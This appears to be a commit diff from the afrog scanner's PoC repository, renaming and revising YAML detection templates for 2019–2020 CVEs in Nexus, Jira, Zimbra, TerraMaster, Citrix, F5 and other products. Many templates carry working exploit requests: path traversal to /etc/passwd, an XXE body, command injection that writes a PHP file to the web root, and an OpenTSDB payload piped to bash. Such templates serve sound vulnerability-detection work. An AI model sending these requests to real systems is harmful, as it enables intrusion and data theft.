afrog-pocs/unreviewed/nexus-cve-2019-7238.yml afrog-pocs/CVE/2019/CVE-2019-7238.yaml

1		-	id: nexus-cve-2019-7238
	1	+	id: CVE-2019-7238
2	2
3	3		info:
4		-	name: nexus-cve-2019-7238
	4	+	name: NEXUS < 3.14.0 Remote Code Execution
5	5		author: hanxiansheng26(https://github.com/hanxiansheng26)
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(800000000, 1000000000)
12	10		r2: randomInt(800000000, 1000000000)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: POST
18	15		path: /service/extdirect
19	16		headers:
		skipped 7 lines

■ ■ ■ ■ ■ ■

afrog-pocs/CVE/2019/CVE-2019-8442.yaml

1	+	id: CVE-2019-8442
2	+
3	+	info:
4	+	name: Atlassian Jira webroot leak
5	+	author: pa55w0rd(www.pa55w0rd.online/)
6	+	severity: high
7	+	description: \|
8	+	Atlassian Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。
9	+	Atlassian Jira 7.13.4之前版本、8.0.4之前版本和8.1.1之前版本中的CachingResourceDownloadRewriteRule类存在安全漏洞。远程攻击者可利用该漏洞访问Jira webroot中的文件。
10	+
11	+	transport: http
12	+	rules:
13	+	r0:
14	+	request:
15	+	method: GET
16	+	path: /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
17	+	expression: response.status == 200 && response.body.bcontains(bytes(string(b"<groupId>com.atlassian.jira</groupId>"))) && response.content_type.contains("application/xml")
18	+	expression: r0()
19	+
20	+

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2019/jira-cve-2019-8449.yml afrog-pocs/CVE/2019/CVE-2019-8449.yaml

1		-	id: jira-cve-2019-8449
	1	+	id: CVE-2019-8449
2	2
3	3		info:
4		-	name: jira-cve-2019-8449
	4	+	name: Jira Information Disclosure
5	5		author: MaxSecurity(https://github.com/MaxSecurity)
6	6		severity: medium
	7	+	reference:
	8	+	- https://nvd.nist.gov/vuln/detail/CVE-2019-8449
7	9
8		-	manual: true
9		-	transport: http
10	10		rules:
11	11		r0:
12	12		request:
13		-	cache: true
14	13		method: GET
15	14		path: /rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false
16	15		expression: response.status == 200 && response.content_type.icontains("json") && response.headers["X-AREQUESTID"] != "" && response.body.bcontains(b"total") && response.body.bcontains(b"groups") && response.body.bcontains(b"header") && response.body.bcontains(b"users")
		skipped 3 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2019/jira-ssrf-cve-2019-8451.yml afrog-pocs/CVE/2019/CVE-2019-8451.yaml

1		-	id: jira-ssrf-cve-2019-8451
	1	+	id: CVE-2019-8451
2	2
3	3		info:
4		-	name: jira-ssrf-cve-2019-8451
	4	+	name: Jira SSRF
5	5		author: zan8in
6	6		severity: medium
7	7		description: "Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞，原因在于JiraWhitelist这个类的逻辑缺陷，成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。经分析，此漏洞无需任何凭据即可触发。"
		skipped 19 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/zimbra-cve-2019-9670-xxe.yml afrog-pocs/CVE/2019/CVE-2019-9670.yaml

1		-	id: zimbra-cve-2019-9670-xxe
	1	+	id: CVE-2019-9670
2	2
3	3		info:
4		-	name: zimbra-cve-2019-9670-xxe
	4	+	name: Zimbra Collaboration XXE
5	5		author: fnmsd(https://blog.csdn.net/fnmsd)
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /Autodiscover/Autodiscover.xml
16	13		headers:
17	14		Content-Type: text/xml
18	15		body: <!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:./" >]><Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"><Request><EMailAddress>[email protected]</EMailAddress><AcceptableResponseSchema>&xxe;</AcceptableResponseSchema></Request></Autodiscover>
19		-	follow_redirects: false
20	16		expression: response.body.bcontains(b"zmmailboxd.out") && response.body.bcontains(b"Requested response schema not available")
21	17		expression: r0()
22	18

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2020/solarwinds-cve-2020-10148.yml afrog-pocs/CVE/2020/CVE-2020-10148.yaml

1		-	id: solarwinds-cve-2020-10148
	1	+	id: CVE-2020-10148
2	2
3	3		info:
4		-	name: solarwinds-cve-2020-10148
	4	+	name: SolarWinds Orion Platform Authentication Bypass
5	5		author: su(https://suzzz112113.github.io/#blog)
6	6		severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(800000000, 1000000000)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: GET
17	14		path: /web.config.i18n.ashx?l=en-US&v={{r1}}
18	15		expression: response.status == 200 && response.body.bcontains(bytes("SolarWinds.Orion.Core.Common")) && response.body.bcontains(bytes("/Orion/NetPerfMon/TemplateSiblingIconUrl"))
		skipped 2 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/nexus-cve-2020-10199.yml afrog-pocs/CVE/2020/CVE-2020-10199.yaml

1		-	id: nexus-cve-2020-10199
	1	+	id: CVE-2020-10199
2	2
3	3		info:
4		-	name: nexus-cve-2020-10199
	4	+	name: Nexus Repository before 3.21.2 allows JavaEL Injection
5	5		author: kingkk(https://www.kingkk.com/)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(40000, 44800)
12	10		r2: randomInt(40000, 44800)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: POST
18	15		path: /rest/beta/repositories/go/group
19	16		headers:
		skipped 7 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/nexus-cve-2020-10204.yml afrog-pocs/CVE/2020/CVE-2020-10204.yaml

1		-	id: nexus-cve-2020-10204
	1	+	id: CVE-2020-10204
2	2
3	3		info:
4		-	name: nexus-cve-2020-10204
	4	+	name: Nexus Repository before 3.21.2 Remote Code Execution
5	5		author: kingkk(https://www.kingkk.com/)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(40000, 44800)
12	10		r2: randomInt(40000, 44800)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: POST
18	15		path: /extdirect
19	16		headers:
		skipped 7 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2020/kong-cve-2020-11710-unauth.yml afrog-pocs/CVE/2020/CVE-2020-11710.yaml

1		-	id: kong-cve-2020-11710-unauth
	1	+	id: CVE-2020-11710
2	2
3	3		info:
4		-	name: kong-cve-2020-11710-unauth
	4	+	name: Kong API Gateway Unauthorized
5	5		author: Loneyer
6	6		severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /
16	13		expression: response.status == 200 && response.body.bcontains(b"kong_env")
17	14		r1:
18	15		request:
19		-	cache: true
20	16		method: GET
21	17		path: /status
22	18		expression: response.status == 200 && response.body.bcontains(b"kong_db_cache_miss")
		skipped 2 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2020/apache-kylin-unauth-cve-2020-13937.yml afrog-pocs/CVE/2020/CVE-2020-13937.yaml

		skipped 7 lines
8	8		reference:
9	9		- https://kylin.apache.org/docs/release_notes.html
10	10		- https://s.tencent.com/research/bsafe/1156.html
11		-	tags: cve,cve2020,apache
12		-	classification:
13		-	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
14		-	cvss-score: 5.30
15		-	cve-id: CVE-2020-13937
16		-	cwe-id: CWE-922
17	11
18		-	manual: true
19		-	transport: http
20	12		rules:
21	13		r0:
22	14		request:
23		-	cache: true
24	15		method: GET
25	16		path: /kylin/api/admin/config
26	17		expression: response.status == 200 && response.headers["content-type"].icontains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url")
		skipped 2 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2020/jira-cve-2020-14179.yml afrog-pocs/CVE/2020/CVE-2020-14179.yaml

1		-	id: jira-cve-2020-14179
	1	+	id: CVE-2020-14179
2	2
3	3		info:
4		-	name: jira-cve-2020-14179
	4	+	name: Jira Information Disclosure
5	5		author: harris2015(https://github.com/harris2015)
6	6		severity: medium
7	7
		skipped 10 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2020/jira-cve-2020-14181.yml afrog-pocs/CVE/2020/CVE-2020-14181.yaml

1		-	id: jira-cve-2020-14181
	1	+	id: CVE-2020-14181
2	2
3	3		info:
4		-	name: jira-cve-2020-14181
	4	+	name: Jira Unauthorized User Enumeration
5	5		author: whwlsfb(https://github.com/whwlsfb)
6	6		severity: medium
7	7
8		-	transport: http
9	8		set:
10	9		r: randomLowercase(8)
11	10		rules:
		skipped 8 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2020/weblogic-cve-2020-14750.yml afrog-pocs/CVE/2020/CVE-2020-14750.yaml

1		-	id: weblogic-cve-2020-14750
	1	+	id: CVE-2020-14750
2	2
3	3		info:
4		-	name: weblogic-cve-2020-14750
	4	+	name: Oracle Weblogic Remote Command Execution
5	5		author: canc3s(https://github.com/canc3s),Soveless(https://github.com/Soveless)
6	6		severity: critical
7	7
		skipped 12 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2020/terramaster-cve-2020-15568.yml afrog-pocs/CVE/2020/CVE-2020-15568.yaml

		skipped 6 lines
7	7		description: TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.
8	8		reference:
9	9		- https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/
10		-	tags: cve,cve2020,terramaster,rce
11		-	classification:
12		-	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
13		-	cvss-score: 9.80
14		-	cve-id: CVE-2020-15568
15		-	cwe-id: CWE-913
16	10
17		-	manual: true
18		-	transport: http
19	11		set:
20	12		r1: randomLowercase(10)
21	13		r2: randomInt(800000000, 1000000000)
		skipped 1 lines
23	15		rules:
24	16		r0:
25	17		request:
26		-	cache: true
27	18		method: GET
28	19		path: /include/exportUser.php?type=3&cla=application&func=_exec&opt=(expr%20{{r2}}%20%2B%20{{r3}})%3E{{r1}}
29		-	follow_redirects: false
30	20		expression: response.status == 200
31	21		r1:
32	22		request:
33		-	cache: true
34	23		method: GET
35	24		path: /include/{{r1}}
36	25		expression: response.status == 200 && response.body.bcontains(bytes(string(r2 + r3)))
		skipped 2 lines

afrog-pocs/unreviewed/saltstack-cve-2020-16846.yml afrog-pocs/CVE/2020/CVE-2020-16846.yaml

Content is identical

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/flink-jobmanager-cve-2020-17519-lfi.yml afrog-pocs/CVE/2020/CVE-2020-17519.yaml

1		-	id: flink-jobmanager-cve-2020-17519-lfi
	1	+	id: CVE-2020-17519
2	2
3	3		info:
4		-	name: flink-jobmanager-cve-2020-17519-lfi
	4	+	name: Apache Flink RESTful API Arbitrary File Read
5	5		author: MaxSecurity(https://github.com/MaxSecurity)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
16	13		expression: response.status == 200 && "^root:[x*]:0:0:".bmatches(response.body)
		skipped 3 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/inspur-tscev4-cve-2020-21224-rce.yml afrog-pocs/CVE/2020/CVE-2020-21224.yaml

1		-	id: inspur-tscev4-cve-2020-21224-rce
	1	+	id: CVE-2020-21224
2	2
3	3		info:
4		-	name: inspur-tscev4-cve-2020-21224-rce
	4	+	name: Inspur ClusterEngine V4.0 Remote Code Execution
5	5		author: jingling(https://github.com/shmilylty)
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(800000000, 1000000000)
12	10		r2: randomInt(800000000, 1000000000)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: POST
18	15		path: /login
19	16		body: op=login&username=1 2\',\'1\'\);`expr%20{{r1}}%20%2b%20{{r2}}`
		skipped 4 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/nexusdb-cve-2020-24571-path-traversal.yml afrog-pocs/CVE/2020/CVE-2020-24571.yaml

1		-	id: nexusdb-cve-2020-24571-path-traversal
	1	+	id: CVE-2020-24571
2	2
3	3		info:
4		-	name: nexusdb-cve-2020-24571-path-traversal
	4	+	name: NexusDB v4.50.22 Path Traversal
5	5		author: su(https://suzzz112113.github.io/#blog)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /../../../../../../../../windows/win.ini
16	13		follow_redirects: true
		skipped 4 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2020/dlink-cve-2020-25078-account-disclosure.yml afrog-pocs/CVE/2020/CVE-2020-25078.yaml

1		-	id: dlink-cve-2020-25078-account-disclosure
	1	+	id: CVE-2020-25078
2	2
3	3		info:
4		-	name: dlink-cve-2020-25078-account-disclosure
	4	+	name: DLink Account Disclosure
5	5		author: kzaopa(https://github.com/kzaopa)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /config/getuser?index=0
16		-	follow_redirects: false
17	13		expression: response.status == 200 && response.headers["Content-Type"].contains("text/plain") && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=")
18	14		expression: r0()
19	15

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2020/CVE-2020-26413.yml afrog-pocs/CVE/2020/CVE-2020-26413.yaml

1	1		id: CVE-2020-26413
2	2
3	3		info:
4		-	name: gitlab-graphql-info-leak-cve-2020-26413
	4	+	name: GitLab Information Disclosure
5	5		author: Print1n(https://github.com/Print1n)
6	6		severity: medium
7	7		description: fofa app="GitLab"
8	8
9		-	manual: true
10		-	transport: http
11	9		rules:
12	10		r0:
13	11		request:
14		-	cache: true
15	12		method: POST
16	13		path: /api/graphql
17	14		headers:
		skipped 5 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/sonarqube-cve-2020-27986-unauth.yml afrog-pocs/CVE/2020/CVE-2020-27986.yaml

1		-	id: sonarqube-cve-2020-27986-unauth
	1	+	id: CVE-2020-27986
2	2
3	3		info:
4		-	name: sonarqube-cve-2020-27986-unauth
	4	+	name: SonarQube unauth
5	5		author: pa55w0rd(www.pa55w0rd.online/)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /api/settings/values
16	13		expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(bytes(string(b"sonaranalyzer-cs.nuget.packageVersion"))) && response.body.bcontains(bytes(string(b"sonar.core.id")))
		skipped 2 lines

afrog-pocs/cve/2020/CVE-2020-28185.yaml afrog-pocs/CVE/2020/CVE-2020-28185.yaml

Content is identical

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2020/CVE-2020-28187.yaml afrog-pocs/CVE/2020/CVE-2020-28187.yaml

		skipped 10 lines
11	11		- https://nvd.nist.gov/vuln/detail/CVE-2020-28187
12	12		- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/TerraMaster/TerraMaster%20TOS%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2020-28187.md
13	13
14		-	manual: true
15		-	transport: http
16	14		rules:
17	15		r0:
18	16		request:
		skipped 5 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2020/terramaster-tos-rce-cve-2020-28188.yml afrog-pocs/CVE/2020/CVE-2020-28188.yaml

1		-	id: erramaster-tos-rce-cve-2020-28188
	1	+	id: CVE-2020-28188
2	2
3	3		info:
4		-	name: erramaster-tos-rce-cve-2020-28188
	4	+	name: TerraMaster TOS Unauthenticated Remote Command Execution
5	5		author: Print1n
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomLowercase(10)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: GET
17	14		path: /include/makecvs.php?Event=http\|echo%20"<?php%20echo%20md5({{r1}});unlink(__FILE__);?>"%20>>%20/usr/www/{{r1}}.php%20&&%20chmod%20755%20/usr/www/{{r1}}.php\|\|
18		-	follow_redirects: false
19	15		expression: response.status == 200 && response.content_type.contains("text/csv") && response.body.bcontains(bytes("Service,DateTime"))
20	16		r1:
21	17		request:
22		-	cache: true
23	18		method: GET
24	19		path: /{{r1}}.php
25		-	follow_redirects: false
26	20		expression: response.status == 200 && response.body.bcontains(bytes(md5(r1)))
27	21		expression: r0() && r1()
28	22

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/cisco-cve-2020-3452-readfile.yml afrog-pocs/CVE/2020/CVE-2020-3452.yaml

1		-	id: cisco-cve-2020-3452-readfile
	1	+	id: CVE-2020-3452
2	2
3	3		info:
4		-	name: cisco-cve-2020-3452-readfile
	4	+	name: Cisco Read-Only Path Traversal
5	5		author: JrD (https://github.com/JrDw0/)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
16		-	follow_redirects: false
17	13		expression: response.status == 200 && response.headers["Content-Type"] == "application/octet-stream" && response.body.bcontains(b"INTERNAL_PASSWORD_ENABLED")
18	14		expression: r0()
19	15

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/opentsdb-cve-2020-35476-rce.yml afrog-pocs/CVE/2020/CVE-2020-35476.yaml

1		-	id: opentsdb-cve-2020-35476-rce
	1	+	id: CVE-2020-35476
2	2
3	3		info:
4		-	name: opentsdb-cve-2020-35476-rce
	4	+	name: OpenTSDB 2.4.0 Remote Code Execution
5	5		author: mvhz81
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomLowercase(3)
12	10		r2: randomLowercase(3)
		skipped 2 lines
15	13		rules:
16	14		r0:
17	15		request:
18		-	cache: true
19	16		method: GET
20	17		path: /s/opentsdb_header.jpg
21		-	follow_redirects: false
22	18		expression: response.status == 200 && response.content_type.contains("text/plain") && response.body.bcontains(b"\xff\xd8\xff\xe1")
23	19		r1:
24	20		request:
25		-	cache: true
26	21		method: POST
27	22		path: /api/put
28	23		body: \|-
		skipped 17 lines
46	41		}
47	42		}
48	43		]
49		-	follow_redirects: false
50	44		expression: sleep(5) && response.status == 204 && response.content_type.contains("json")
51	45		r2:
52	46		request:
53		-	cache: true
54	47		method: GET
55	48		path: /q?start=2000/10/21-00:00:00&end=2020/12/25-00:00:00&m=sum:{{r1}}.{{r2}}.{{r3}}&o=&yrange=[0:system('echo%20-e%20"ZWNobyAxMjMgfG1kNXN1bSAxPiYyCg=="%20\|%20base64%20-d%20\|bash')]&wxh=1698x316&style=linespoint&json
56		-	follow_redirects: false
57	49		expression: response.status == 400 && response.content_type.contains("json") && "ba1f2511fc30423bdbb183fe33f3dd0f".bmatches(response.body)
58	50		expression: r0() && r1() && r2()
59	51

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/gateone-cve-2020-35736.yml afrog-pocs/CVE/2020/CVE-2020-35736.yaml

1		-	id: gateone-cve-2020-35736
	1	+	id: CVE-2020-35736
2	2
3	3		info:
4		-	name: gateone-cve-2020-35736
	4	+	name: GateOne Arbitrary File Download
5	5		author: tangshoupu
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /
16	13		follow_redirects: true
17	14		expression: response.status == 200 && response.body.bcontains(b"GateOne.init") && response.body.bcontains(b"href=\"/static/gateone.css\"")
18	15		r1:
19	16		request:
20		-	cache: true
21	17		method: GET
22	18		path: /downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
23		-	follow_redirects: false
24	19		expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
25	20		expression: r0() && r1()
26	21
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/zeit-nodejs-cve-2020-5284-directory-traversal.yml afrog-pocs/CVE/2020/CVE-2020-5284.yaml

1		-	id: zeit-nodejs-cve-2020-5284-directory-traversal
	1	+	id: CVE-2020-5284
2	2
3	3		info:
4		-	name: zeit-nodejs-cve-2020-5284-directory-traversal
	4	+	name: Next.js .next limited path traversal
5	5		author: x1n9Qi8
6		-	severity: high
	6	+	severity: medium
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /_next/static/../server/pages-manifest.json
16	13		expression: 'response.status == 200 && response.headers["Content-Type"].contains("application/json") && "/_app\": \".*?_app\\.js".bmatches(response.body)'
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/spring-cloud-cve-2020-5405.yml afrog-pocs/CVE/2020/CVE-2020-5405.yaml

1		-	id: spring-cloud-cve-2020-5405
	1	+	id: CVE-2020-5405
2	2
3	3		info:
4		-	name: spring-cloud-cve-2020-5405
	4	+	name: Spring Cloud Directory Traversal
5	5		author: kingkk(https://www.kingkk.com/)
6		-	severity: high
	6	+	severity: medium
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf
16	13		follow_redirects: true
		skipped 3 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/spring-cloud-cve-2020-5410.yml afrog-pocs/CVE/2020/CVE-2020-5410.yaml

1		-	id: spring-cloud-cve-2020-5410
	1	+	id: CVE-2020-5410
2	2
3	3		info:
4		-	name: spring-cloud-cve-2020-5410
	4	+	name: Spring Cloud Config Server Directory Traversal
5	5		author: Soveless(https://github.com/Soveless)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a
16	13		expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
		skipped 2 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/gilacms-cve-2020-5515.yml afrog-pocs/CVE/2020/CVE-2020-5515.yaml

1		-	id: gilacms-cve-2020-5515
	1	+	id: CVE-2020-5515
2	2
3	3		info:
4		-	name: gilacms-cve-2020-5515
	4	+	name: Gila CMS 1.11.8 SQL Injection.
5	5		author: PickledFish(https://github.com/PickledFish)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(200000000, 210000000)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: GET
17	14		path: /admin/sql?query=SELECT%20md5({{r1}})
18	15		expression: response.body.bcontains(bytes(md5(string(r1))))
		skipped 3 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/f5-tmui-cve-2020-5902-rce.yml afrog-pocs/CVE/2020/CVE-2020-5902.yaml

1		-	id: f5-tmui-cve-2020-5902-rce
	1	+	id: CVE-2020-5902
2	2
3	3		info:
4		-	name: f5-tmui-cve-2020-5902-rce
	4	+	name: F5 BIG-IP TMUI RCE
5	5		author: Jing Ling
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp
16	13		headers:
		skipped 6 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/satellian-cve-2020-7980-rce.yml afrog-pocs/CVE/2020/CVE-2020-7980.yaml

1		-	id: satellian-cve-2020-7980-rce
	1	+	id: CVE-2020-7980
2	2
3	3		info:
4		-	name: satellian-cve-2020-7980-rce
	4	+	name: Satellian 1.12 Remote Code Execution
5	5		author: JingLing(https://hackfun.org/)
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(800000000, 1000000000)
12	10		r2: randomInt(800000000, 1000000000)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: POST
18	15		path: /cgi-bin/libagent.cgi?type=J
19	16		headers:
		skipped 7 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/citrix-cve-2020-8191-xss.yml afrog-pocs/CVE/2020/CVE-2020-8191.yaml

1		-	id: citrix-cve-2020-8191-xss
	1	+	id: CVE-2020-8191
2	2
3	3		info:
4	4		name: citrix-cve-2020-8191-xss
5	5		author: JingLing(https://hackfun.org/)
6		-	severity: high
	6	+	severity: medium
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomLowercase(6)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: POST
17	14		path: /menu/stapp
18	15		headers:
		skipped 6 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/citrix-cve-2020-8193-unauthorized.yml afrog-pocs/CVE/2020/CVE-2020-8193.yaml

1		-	id: citrix-cve-2020-8193-unauthorized
	1	+	id: CVE-2020-8193
2	2
3	3		info:
4		-	name: citrix-cve-2020-8193-unauthorized
	4	+	name: Citrix unauthenticated LFI
5	5		author: bufsnake(https://github.com/bufsnake)
6		-	severity: high
	6	+	severity: medium
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		user: randomLowercase(8)
12	10		pass: randomLowercase(8)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: POST
18	15		path: /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1
19	16		headers:
		skipped 1 lines
21	18		X-NITRO-PASS: '{{pass}}'
22	19		X-NITRO-USER: '{{user}}'
23	20		body: <appfwprofile><login></login></appfwprofile>
24		-	follow_redirects: false
25	21		expression: response.status == 406 && "(?i)SESSID=\\w{32}".bmatches(bytes(response.headers["Set-Cookie"]))
26	22		expression: r0()
27	23

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/citrix-xenmobile-cve-2020-8209.yml afrog-pocs/CVE/2020/CVE-2020-8209.yaml

1		-	id: citrix-xenmobile-cve-2020-8209
	1	+	id: CVE-2020-8209
2	2
3	3		info:
4		-	name: citrix-xenmobile-cve-2020-8209
	4	+	name: Citrix XenMobile Server Path Traversal
5	5		author: B1anda0(https://github.com/B1anda0)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
16		-	follow_redirects: false
17	13		expression: response.status == 200 && response.content_type.contains("octet-stream") && "^root:[x*]:0:0:".bmatches(response.body)
18	14		expression: r0()
19	15

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/draytek-cve-2020-8515.yml afrog-pocs/CVE/2020/CVE-2020-8515.yaml

1		-	id: draytek-cve-2020-8515
	1	+	id: CVE-2020-8515
2	2
3	3		info:
4		-	name: draytek-cve-2020-8515
	4	+	name: DrayTek pre-auth RCE
5	5		author: Soveless(https://github.com/Soveless)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /cgi-bin/mainfunction.cgi
16	13		headers:
		skipped 6 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2020/dlink-cve-2020-9376-dump-credentials.yml afrog-pocs/CVE/2020/CVE-2020-9376.yaml

1		-	id: dlink-cve-2020-9376-dump-credentials
	1	+	id: CVE-2020-9376
2	2
3	3		info:
4		-	name: dlink-cve-2020-9376-dump-credentials
	4	+	name: DLink dir610 credentials dump
5	5		author: x1n9Qi8
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /getcfg.php
16	13		headers:
		skipped 5 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/skywalking-cve-2020-9483-sqli.yml afrog-pocs/CVE/2020/CVE-2020-9483.yaml

1		-	id: skywalking-cve-2020-9483-sqli
	1	+	id: CVE-2020-9483
2	2
3	3		info:
4		-	name: skywalking-cve-2020-9483-sqli
	4	+	name: SSkyWalking SQLI
5	5		author: sndav(https://github.com/Sndav)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
